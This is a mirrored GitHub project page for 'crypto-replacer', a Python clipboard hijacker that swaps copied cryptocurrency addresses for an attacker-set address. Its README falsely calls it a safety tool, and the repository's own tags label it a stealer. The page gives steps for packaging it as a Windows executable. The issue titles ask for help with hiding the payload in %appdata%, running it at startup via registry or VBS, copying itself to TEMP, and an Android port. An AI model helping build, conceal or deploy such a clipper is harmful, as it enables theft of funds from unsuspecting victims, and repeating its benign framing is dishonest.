Coder Social home page Coder Social logo

matifanger / crypto-replacer Goto Github PK

View Code? Open in Web Editor NEW
17.0 2.0 5.0 256 KB

This script is a tool to automatically replace cryptocurrency addresses in the clipboard with a predefined address. This can be useful to avoid accidentally sending cryptocurrency to the wrong address.

Python 100.00%
crypto address stealer clipboard python replacer cpp

crypto-replacer's Introduction

CRYPTO REPLACER

Description ๐Ÿ“Œ

This script is a tool to automatically replace cryptocurrency addresses in the clipboard with a predefined address. This can be useful to avoid accidentally sending cryptocurrency to the wrong address.

Starting ๐Ÿš€

Requirements:

pyperclip
time
re
ctypes
os
sys
inspect

Downloading:

git clone https://github.com/matifanger/crypto-replacer
cd crypto-replacer
pip3 install -r requirements.txt

Configuring โš™๏ธ

Open (crypto-replacer.py). Look for variable (my_addresses) and setup with anything you want.

Making the binaries:

When the configuration is done you should make the executable (.exe) to work in windows.

pip install auto-py-to-exe

then

auto-py-to-exe

In Auto Py To Exe (Mandatory)

One directory
Console based

Proper usage here

Regex cryptos - Supported ๐Ÿ“–

  • Bitcoin
  • Ethereum
  • Dash
  • Cardano
  • Polkadot
  • Ripple
  • Tron
  • Litecoin
  • Monero
  • Doge
  • Solana

Todo ๐Ÿ“„

  • Add more cryptos
  • Add linux support

crypto-replacer's People

Contributors

matifanger avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

crypto-replacer's Issues

ERROR

Error after hibernating pc

Screenshot (99)

Error in code

Doesn't run on startup
Don't hide payload %appdata% folder
attrib +h not functional in the code
Startup.vbs not working
Litcoin Regex not working

([WinError 5] Access is denied.)

File "pyperclip_init_.py", line 490, in paste_windows
File "contextlib.py", line 135, in enter
File "pyperclip_init_.py", line 452, in clipboard
pyperclip.PyperclipWindowsException: Error calling OpenClipboard ([WinError 5] Access is denied.)

Win error Access Denied

Screenshot 2022-08-27 220622

I get this issue everything I hibernate or sign-out even after running as administrator before signing out

administrator

After gaining access "on behalf of the administrator" the program does not start after restarting the PC.
(I looked in the console, writes that "path not found")

Is it possible to implement this for android apk?

No startup path

Can you make the program copy itself to TEMP after execution so that reg can have a startup path.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.